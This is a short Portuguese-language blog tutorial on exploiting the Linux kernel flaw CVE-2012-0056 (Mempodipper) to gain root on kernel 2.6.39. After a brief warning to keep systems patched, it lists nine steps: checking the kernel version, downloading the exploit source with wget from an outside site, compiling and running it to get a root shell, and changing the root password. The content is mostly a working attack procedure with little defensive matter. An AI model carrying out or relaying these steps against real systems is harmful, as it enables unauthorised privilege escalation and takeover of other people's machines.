A vulnerabilidade exibida no CVE-2012-0056 destaca a possibilidade de inserir um shell code na memória e obter acesso como root no kernel 2.6.39 e outras versões.
Ainda há muitas empresas que possuem soluções críticas em produção sobre sistemas vulneráveis como este.
É extremamente importante manter todos os sistemas sempre atualizados, reforce este ponto com seus clientes.
Segue passo a passo como explorar a vulnerabilidade:
Passo 01
Logue com um usuário comum e verifique a versão no kernel
[email protected]:~$ uname -r
2.6.39.4
Passo 02
Realize o download do exploit mempodipper.c
[email protected]:~$ wget www.100security.com.br/downloads/mempodipper.c
Passo 03
Visualize o arquivo mempodipper.c
[email protected]:~$ ls -l
Passo 04
Compile o exploit usando o GCC
[email protected]:~$ gcc mempodipper.c -o mempodipper
Passo 05
O exploit mempodipper foi compilado
[email protected]:~$ ls -l
Passo 06
Execute o exploit
[email protected]:~$ ./mempodipper
Passo 07
Acesso como root realizado com sucesso!
Passo 08
Altere a senha do root
sh-4.1# passwd
Passo 09
Acesso como root com a nova senha realizada com sucesso!